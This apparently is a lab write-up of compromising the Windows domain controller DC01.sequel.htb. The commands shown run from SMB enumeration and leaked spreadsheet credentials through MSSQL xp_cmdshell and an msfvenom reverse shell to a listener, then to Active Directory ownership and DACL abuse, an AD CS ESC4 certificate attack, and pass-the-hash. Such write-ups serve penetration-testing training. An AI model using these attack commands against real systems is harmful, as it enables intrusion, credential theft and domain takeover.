Provided Credentials#
As is common in real-world Windows penetration tests, the engagement started with valid domain credentials:
| Username | Password |
|---|---|
| rose | KxEPkKe6R8su |
Enumeration#
Nmap#
An initial TCP scan was performed using Nmap to identify exposed services on the target host.
sudo nmap -sVC 10.129.232.128 -oA nmap/10.129.232.128-tcp
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-21 14:37 CET
Nmap scan report for 10.129.232.128
Host is up (0.056s latency).
Not shown: 991 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
| Not valid before: 2025-06-26T11:46:45
|_Not valid after: 2124-06-08T17:00:40
|_ssl-date: 2026-02-21T13:38:39+00:00; 0s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2026-02-21T13:38:39+00:00; 0s from scanner time.
| ms-sql-info:
| 10.129.2.1:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.2.1:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-02-21T13:36:02
|_Not valid after: 2056-02-21T13:36:02
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
| Not valid before: 2025-06-26T11:46:45
|_Not valid after: 2124-06-08T17:00:40
|_ssl-date: 2026-02-21T13:38:39+00:00; 0s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
| Not valid before: 2025-06-26T11:46:45
|_Not valid after: 2124-06-08T17:00:40
|_ssl-date: 2026-02-21T13:38:39+00:00; 0s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-02-21T13:38:03
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.86 secondsThe scan results clearly indicated that the target was a Windows Domain Controller, as evidenced by the presence of LDAP (636), SMB (445), and Active Directory Global Catalog ports (3268/3269).
Additionally, the SSL certificates revealed the domain name sequel.htb and confirmed that the host was DC01.sequel.htb.
To ensure proper name resolution during subsequent interactions, the domain name was added to /etc/hosts:
sudo nano /etc/hosts
SMB Shares#
SMB shares were enumerated using the provided credentials.
nxc smb sequel.htb -u "rose" -p "KxEPkKe6R8su" --shares
A share named Accounting Department was found to be readable. Access was obtained using:
smbclient //sequel.htb/Accounting\ Department -U "rose%KxEPkKe6R8su"
Two Microsoft Excel files were identified and downloaded for offline analysis. Initially, the files appeared corrupted. However, Microsoft Excel’s Open and Repair functionality was used to recover their contents.
The file accounts.xlsx contained clear text credentials for four users.
After performing password spraying against exposed services, the sa account was found to be valid for the MSSQL service.
nxc mssql sequel.htb -u "sa" -p "<password>" --local-authAccess was obtained using Impacket’s mssqlclient:
impacket-mssqlclient [email protected]
After authentication, xp_cmdshell was enabled:
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
## Test
EXEC xp_cmdshell "net user";
Since xp_cmdshell was automatically disabled after execution, commands were executed inline:
EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; EXEC xp_cmdshell "net user";FootHold#
To obtain a reverse shell, a payload was generated using Msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.219 LPORT=4444 -f exe > anx.exe
The payload was then uploaded to the server:
nxc mssql sequel.htb -u "sa" -p "MSSQLP@ssw0rd\!" --local-auth --put-file anx.exe "C:\Users\sql_svc\Documents\anx.exe"
File upload was verified:
EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; EXEC xp_cmdshell "dir C:\Users\sql_svc\Documents";
A listener was started on the attacking machine:
rlwrap nc -lvnp 4444The payload was executed via SQL:
EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; EXEC xp_cmdshell "C:\Users\sql_svc\Documents\anx.exe";
A reverse shell was successfully received as sql_svc.
Credentials for domain sql_svc#
The configuration files of the server were examined and credentials for the domain account sql_svc user were found on C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI.
Privilege Escalation#
From sql_svc to ryan#
Usernames were enumerated to generate a wordlist and a password spraying attack was performed to find credential reuse:
nxc smb sequel.htb -u Enumeration/users.txt -p "<password>"
It was discovered that the user ryan reused the same password and had WinRM access.
evil-winrm -u 'ryan' -p '<password>' -i sequel.htb
From ryan to ca_svc#
All the domain information was extracted and indexed into BloodHound to find privilege escalation vectors:
nxc ldap sequel.htb -d retro2.vl -u 'ryan' -p '<password>' --bloodhound --dns-server 10.129.232.128 -c All
User ryan possessed the WriteOwner permission over the user account ca_svc, which was a member of the Cert Publishers group. Based on this misconfiguration, the technique described in the following article was used to abuse these privileges and gain control of the ca_svc account:
As described in the referenced blog:
“Attackers can exploit the WriteOwner permission when they gain control of an object that has this privilege over another directory object. This allows them to grant ownership, then assign full control, and ultimately perform attacks like Kerberoasting or a password change without knowing the victim’s current credentials.”
In this scenario, a password change attack was performed. The Impacket toolkit was used to carry out the attack. First, the owneredit tool was executed to modify the ownership of the ca_svc account, assigning it to ryan.
impacket-owneredit -action write -new-owner 'ryan' -target-dn 'CN=CERTIFICATION AUTHORITY,CN=Users,DC=sequel,DC=htb' 'sequel.htb'/'ryan':'<password>' -dc-ip 10.129.232.128
Using the owneredit utility, the ownership of the ca_svc user object was successfully modified. As a result, the ryan account became the owner of the ca_svc object.
Next, the dacledit tool was executed to modify the object’s DACL and grant ryan full control over the ca_svc user object.
impacket-dacledit -action 'write' -rights 'FullControl' -principal 'ryan' -target-dn 'CN=CERTIFICATION AUTHORITY,CN=Users,DC=sequel,DC=htb' 'sequel.htb'/'ryan':'<password>' -dc-ip 10.129.232.128
The password of ca_svc was changed using bloodyAD.
bloodyAD --host "10.129.232.128" -d "sequel.htb" -u "ryan" -p "<password>" set password "ca_svc" "Password@987"
From ca_svc to Administrator (AD CS)#
AD CS Enumeration#
After control of the CA service account was obtained, certificate templates were enumerated using Certipy to identify potential misconfigurations.
certipy-ad find -u [email protected] -p "Password@987" -dc-ip "10.129.232.128" -vulnerableThe -vulnerable flag was used to filter and display only templates that were susceptible to known Active Directory Certificate Services (AD CS) abuse techniques.
The results showed that the ca_svc account had excessive permissions over the DunderMifflinAuthentication certificate template. These permissions enabled exploitation via an ESC4 attack.
Exploiting AD CS#
The following reference was used as guidance for Active Directory Certificate Services (AD CS) abuse techniques. In this case, the ESC4 attack path was followed:
First, the original template configuration was saved, and the DunderMifflinAuthentication certificate template was modified to introduce a vulnerable configuration.
certipy-ad template -u [email protected] -p "Password@987" -dc-ip "10.129.232.128" -template "DunderMifflinAuthentication" -write-default-configuration
Next, a certificate was requested using the modified template. A custom Subject Alternative Name (SAN) was specified to impersonate the domain administrator account.
certipy-ad req -u [email protected] -p "Password@987" -dc-ip "10.129.232.128" -target "dc01.sequel.htb" -ca "sequel-DC01-CA" -template "DunderMifflinAuthentication" -upn "[email protected]"
The issued certificate was then used for authentication, resulting in the extraction of the NTLM hash of the domain Administrator account.
certipy-ad auth -pfx administrator.pfx -username Administrator -domain sequel.htb -dc-ip 10.129.232.128
After successful exploitation, the original template configuration was restored to its previous state.
certipy-ad template -u [email protected] -p "Password@987" -dc-ip "10.129.232.128" -template "DunderMifflinAuthentication" -write-configuration "DunderMifflinAuthentication.json" -no-saveFinally, the server was accessed via WinRM using a Pass-the-Hash technique with the obtained Administrator NTLM hash.
evil-winrm -u 'Administrator' -H 7a8d4e04986afa8ed4060f75e5a0b3ff -i sequel.htb